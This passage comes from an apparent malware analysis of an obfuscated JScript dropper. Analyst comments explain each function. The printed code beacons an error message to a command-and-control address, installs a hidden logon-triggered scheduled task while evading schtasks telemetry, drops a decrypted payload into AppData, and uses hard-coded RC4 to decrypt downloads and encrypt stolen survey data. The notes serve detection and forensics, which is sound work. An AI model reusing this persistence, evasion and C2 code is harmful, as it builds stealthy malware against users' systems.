           // exists. Only when that throws does it POST the 5-byte body "error" to
           // B_TG, using the same headers and User-Agent as the other requests.
           // Returns "" on the error path and nothing otherwise.
  516.     try {
  517.         if (QUjy.FILEEXISTS(YIme)) {
  518.             WE86.Run("\x22" + YIme + "\x22");
  519.         }
  520.     } catch (e) {
  521.         var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
  522.         Kpxo.OPEN("post", B_TG, false);
  523.         var ePMy = "error";
  524.         Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
  525.         Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
  526.         Kpxo.SETREQUESTHEADER("content-length:", ePMy.length);
  527.         Kpxo.SEND(ePMy);
  528.         return "";
  529.     }
  530. }
  531.  
  532. function RPbY(r_X5) {
           // Analyst note: formats a non-negative integer as an upper-case hex string
           // without padding, one nibble at a time from the low end.
           // cz_b() uses the result as a lookup key into b92A.
  533.     var w8rG = "0123456789ABCDEF";
  534.     var yjrw = w8rG.substr(r_X5 & 15, 1);
  535.     while (r_X5 > 15) {
  536.         r_X5 >>>= 4;
  537.         yjrw = w8rG.substr(r_X5 & 15, 1) + yjrw;
  538.     }
  539.     return yjrw;
  540. }
  541.  
  542. function NptO(jlEi) {
           // Analyst note: parses a hex string into a number; the inverse of RPbY().
  543.     return parseInt(jlEi, 16);
  544. }
  545.  
  546. function eV_C(Bjmr, RT6x, O7Ec, YBwP, T9Px, egNr, rmGH) {
           // Analyst note: registers a scheduled task through the Schedule.Service
           // COM API instead of schtasks.exe, so no schtasks command line appears in
           // process telemetry.
           // Parameters: Bjmr task name, RT6x description, O7Ec user (principal,
           // author and trigger user), YBwP action path, T9Px action arguments,
           // egNr working directory, rmGH value for the task's Hidden setting.
           // Returns true on success and false on any exception.
  547.     try {
  548.         var BGfI = WScript.CreateObject("Schedule.Service");
  549.         BGfI.Connect();
               // The task is placed in the existing "WPD" task folder rather than the
               // root folder, which keeps it out of the top-level task list.
  550.         var w2cQ = BGfI.GetFolder("WPD");
  551.         var xSm3 = BGfI.NewTask(0);
  552.         xSm3.Principal.UserId = O7Ec;
               // LogonType 6 = TASK_LOGON_INTERACTIVE_TOKEN_OR_PASSWORD.
  553.         xSm3.Principal.LogonType = 6;
  554.         var wK2F = xSm3.RegistrationInfo;
  555.         wK2F.Description = RT6x;
  556.         wK2F.Author = O7Ec;
  557.         var aYbx = xSm3.Settings;
  558.         aYbx.Enabled = true;
  559.         aYbx.StartWhenAvailable = true;
  560.         aYbx.Hidden = rmGH;
               // Fixed trigger validity window; after the end boundary the trigger no
               // longer fires.
  561.         var oSP7 = "2015-07-12T11:47:24";
  562.         var svaG = "2020-03-21T08:00:00";
  563.         var LDoN = xSm3.Triggers;
               // Trigger type 9 = TASK_TRIGGER_LOGON: runs when user O7Ec logs on.
  564.         var r9EC = LDoN.Create(9);
  565.         r9EC.StartBoundary = oSP7;
  566.         r9EC.EndBoundary = svaG;
  567.         r9EC.Id = "LogonTriggerId";
  568.         r9EC.UserId = O7Ec;
  569.         r9EC.Enabled = true;
               // Action type 0 = TASK_ACTION_EXEC.
  570.         var gQu9 = xSm3.Actions.Create(0);
  571.         gQu9.Path = YBwP;
  572.         gQu9.Arguments = T9Px;
  573.         gQu9.WorkingDirectory = egNr;
               // Flags 6 = TASK_CREATE_OR_UPDATE, logon type 3 = TASK_LOGON_INTERACTIVE_TOKEN,
               // no stored credentials. Registration is logged as Security event 4698
               // when "Audit Other Object Access Events" is enabled.
  574.         w2cQ.RegisterTaskDefinition(Bjmr, xSm3, 6, "", "", 3);
  575.         return true;
  576.     } catch (Err) {
  577.         return false;
  578.     }
  579. }
  580.  
  581. function KhDn(Bjmr) {
           // Analyst note: removes the task named Bjmr from the "WPD" task folder by
           // enumerating the folder's tasks and deleting each name match.
           // UGgw records whether a deletion happened but is never returned: the
           // function yields undefined normally and false when an exception occurs.
           // Deletion is logged as Security event 4699 when "Audit Other Object
           // Access Events" is enabled.
  582.     try {
  583.         var UGgw = false;
  584.         var BGfI = WScript.CreateObject("Schedule.Service");
  585.         BGfI.Connect()
  586.  
  587.  
  588.         var w2cQ = BGfI.GetFolder("WPD");
  589.         var FLs6 = w2cQ.GetTasks(0);
  590.         if (FLs6.count >= 0) {
  591.             var gk1H = new Enumerator(FLs6);
  592.             for (; !gk1H.atEnd(); gk1H.moveNext()) {
  593.                 if (gk1H.item().name == Bjmr) {
  594.                     w2cQ.DeleteTask(Bjmr, 0);
  595.                     UGgw = true;
  596.                 }
  597.             }
  598.         }
  599.     } catch (Err) {
  600.         return false;
  601.     }
  602. }
  603.  
  604. function cz_b(S3Ws) {
           // Analyst note: converts the text read from the code-page-437 stream into
           // an array of numeric values. Character codes below 128 are kept as they
           // are. Codes of 128 and above are looked up in b92A, keyed by their
           // upper-case hex form, and the hex string found there is parsed back to a
           // number.
           // b92A is defined outside this excerpt; presumably it maps the Unicode
           // code points produced by CP437 decoding back to the original byte
           // values (confirm there).
  605.     var n9mV = [];
  606.     var mvAu = S3Ws.length;
  607.     for (var i = 0; i < mvAu; i++) {
  608.         var wtVX = S3Ws.charCodeAt(i);
  609.         if (wtVX >= 128) {
  610.             var h = b92A['' + RPbY(wtVX)];
  611.            wtVX = NptO(h);
  612.         }
  613.         n9mV.push(wtVX);
  614.     }
  615.     return n9mV;
  616. }
  617.  
  618. function NoRS(ExY2, igeK) {
           // Analyst note: writes the string ExY2 to the path igeK through an
           // ADODB.Stream in text mode with the iso-8859-1 charset, i.e. one byte per
           // character for codes 0-255. SaveToFile option 2 (adSaveCreateOverWrite)
           // replaces an existing file.
           // XBL3() uses this to drop the decrypted payload, so the write is done by
           // the script host process itself, not by a separate downloader.
  619.     var m3mH = WScript.CreateObject("ADODB.Stream");
  620.     m3mH.type = 2;
  621.     m3mH.Charset = "iso-8859-1";
  622.     m3mH.Open();
  623.     m3mH.WriteText(ExY2);
  624.     m3mH.Flush();
  625.     m3mH.Position = 0;
  626.     m3mH.SaveToFile(igeK, 2);
  627.     m3mH.close();
  628. }
  629.  
  630. function Blgx(gaWo) {
           // Analyst note: selects the working directory and stores it in the global
           // wyKN ("\x5c" is a backslash). Candidates, in order, for user w5mY:
           //   c:\Users\<user>\AppData\Local\Microsoft\Windows\
           //   c:\Users\<user>\AppData\Local\Temp\
           //   c:\Documents and Settings\<user>\Application Data\Microsoft\Windows\
           // The last one is assigned without an existence check. The parameter gaWo
           // is not used. These directories are where the script copy, the .pif drop
           // and ~dat.tmp appear, so they are the places to examine on a suspect host.
  631.     wyKN = "c:\x5cUsers\x5c" + w5mY + "\x5cAppData\x5cLocal\x5cMicrosoft\x5cWindows\x5c";
  632.     if (!QUjy.FOLDEREXISTS(wyKN))
  633.         wyKN = "c:\x5cUsers\x5c" + w5mY + "\x5cAppData\x5cLocal\x5cTemp\x5c";
  634.     if (!QUjy.FOLDEREXISTS(wyKN))
  635.         wyKN = "c:\x5cDocuments and Settings\x5c" + w5mY + "\x5cApplication Data\x5cMicrosoft\x5cWindows\x5c";
  636.     return wyKN
  637. }
  638.  
  639. function FXx9(Z_3F, VMd7) {
           // Analyst note: standard RC4. Z_3F is the key string and VMd7 the data,
           // indexed as VMd7[y] and XORed as numbers. The result is returned as a
           // string with one character per output byte.
           // The key's characters are used directly through charCodeAt, so the
           // 32-character hex-looking key passed by the callers acts as 32 ASCII
           // bytes, not as 16 decoded bytes.
           // RC4 is symmetric: this one routine decrypts the download in XBL3() and
           // encrypts the survey output in Fv6b(), both with the same hard-coded key,
           // so captured payloads and uploads can be decrypted offline for analysis.
  640.     var NNSX = [];
  641.     var JDro = 0;
  642.     var KagY;
  643.     var n9mV = '';
           // Key scheduling: identity permutation, then key-dependent swaps.
  644.    for (var i = 0; i < 256; i++) {
  645.         NNSX[i] = i;
  646.     }
  647.     for (var i = 0; i < 256; i++) {
  648.         JDro = (JDro + NNSX[i] + Z_3F.charCodeAt(i % Z_3F.length)) % 256;
  649.         KagY = NNSX[i];
  650.         NNSX[i] = NNSX[JDro];
  651.         NNSX[JDro] = KagY;
  652.     }
           // Keystream generation, XORed with the input one value at a time.
  653.     var i = 0;
  654.     var JDro = 0;
  655.     for (var y = 0; y < VMd7.length; y++) {
  656.         i = (i + 1) % 256;
  657.         JDro = (JDro + NNSX[i]) % 256;
  658.         KagY = NNSX[i];
  659.         NNSX[i] = NNSX[JDro];
  660.         NNSX[JDro] = KagY;
  661.         n9mV += String.fromCharCode(VMd7[y] ^ NNSX[(NNSX[i] + NNSX[JDro]) % 256]);
  662.     }
  663.     return n9mV;
  664. }